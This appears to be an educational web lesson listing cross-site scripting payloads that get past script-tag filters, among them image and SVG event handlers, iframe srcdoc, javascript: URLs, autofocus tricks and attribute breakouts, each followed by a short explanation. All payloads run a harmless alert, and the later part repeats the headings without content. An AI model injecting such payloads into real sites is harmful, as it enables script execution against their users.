Concrete examples of XSS: copy-paste code snippets

Lesson#5 of 12 in topic Theory

Below are classic non‑<script> XSS tricks that show why filtering <script> is useless. All examples use harmless alert() and are for education / labs.

1️⃣ `<img src=x onerror=…>` (the classic)

🧨 Payload


<img src=x onerror=alert('XSS')>

💡 Why it works

x is not a valid image
onerror fires automatically
No <script> tag involved

🔥 This bypasses tons of naive filters.

2️⃣ Mouse events (`onmouseenter`, `onmouseover`)

🧨 Payload


<div onmouseenter="alert('XSS')">Hover me</div>


<div onmouseover="alert('XSS')">Move mouse</div>

💡 Why attackers like this

Looks innocent
Doesn’t auto-execute
Works great in stored XSS (comments, profiles)

3️⃣ SVG-based XSS (very common bypass)

🧨 Payload


<svg onload=alert('XSS')>

Or:


<svg><script>alert('XSS')</script></svg>

💡 Why it works

SVG is XML + JS
Many filters allow <svg> but forget events

4️⃣ `<iframe>` injection

🧨 Payload


<iframe src="javascript:alert('XSS')"></iframe>

Or:


<iframe srcdoc="<script>alert('XSS')</script>"></iframe>

⚠️ Real-world note

srcdoc is often forgotten in sanitizers.

5️⃣ `<details>` + `ontoggle`

🧨 Payload


<details open ontoggle="alert('XSS')">

💡 Why this is sneaky

Rarely filtered
Executes when element opens

6️⃣ `<input autofocus onfocus=…>`

🧨 Payload


<input autofocus onfocus="alert('XSS')">

💥 What happens

Page loads
Input auto-focuses
onfocus fires instantly

No click needed 👀

7️⃣ `<video>` / `<audio>` events

🧨 Payload


<video src=x onerror="alert('XSS')"></video>


<audio src=x onerror="alert('XSS')"></audio>

8️⃣ `<body onload>` injection

🧨 Payload


<body onload="alert('XSS')">

Works if attacker can inject into page template.

9️⃣ `javascript:` URLs

🧨 Payload


<a href="javascript:alert('XSS')">Click</a>

Even sneakier:


<a href="JaVaScRiPt:alert('XSS')">Click</a>

🔟 Breaking out of attributes

Vulnerable HTML


<img src="USER_INPUT">

🧨 Payload


x" onerror="alert('XSS')

💥 Result


<img src="x" onerror="alert('XSS')">

1️⃣1️⃣ `style` attribute + CSS tricks (browser‑dependent)

🧨 Payload


<div style="background-image:url(javascript:alert('XSS'))">

⚠️ Less reliable today, but great teaching example.

Concrete examples of XSS: copy-paste code snippets

1️⃣ <img src=x onerror=…> (the classic)

🧨 Payload

💡 Why it works

2️⃣ Mouse events (onmouseenter, onmouseover)

🧨 Payload

💡 Why attackers like this

3️⃣ SVG-based XSS (very common bypass)

🧨 Payload

💡 Why it works

4️⃣ <iframe> injection

🧨 Payload

⚠️ Real-world note

5️⃣ <details> + ontoggle

🧨 Payload

💡 Why this is sneaky

6️⃣ <input autofocus onfocus=…>

🧨 Payload

💥 What happens

7️⃣ <video> / <audio> events

🧨 Payload

8️⃣ <body onload> injection

🧨 Payload

9️⃣ javascript: URLs

🧨 Payload

🔟 Breaking out of attributes

Vulnerable HTML

🧨 Payload

💥 Result

1️⃣1️⃣ style attribute + CSS tricks (browser‑dependent)

🧨 Payload

1️⃣ `<img src=x onerror=…>` (the classic)

2️⃣ Mouse events (`onmouseenter`, `onmouseover`)

4️⃣ `<iframe>` injection

5️⃣ `<details>` + `ontoggle`

6️⃣ `<input autofocus onfocus=…>`

7️⃣ `<video>` / `<audio>` events

8️⃣ `<body onload>` injection

9️⃣ `javascript:` URLs

1️⃣1️⃣ `style` attribute + CSS tricks (browser‑dependent)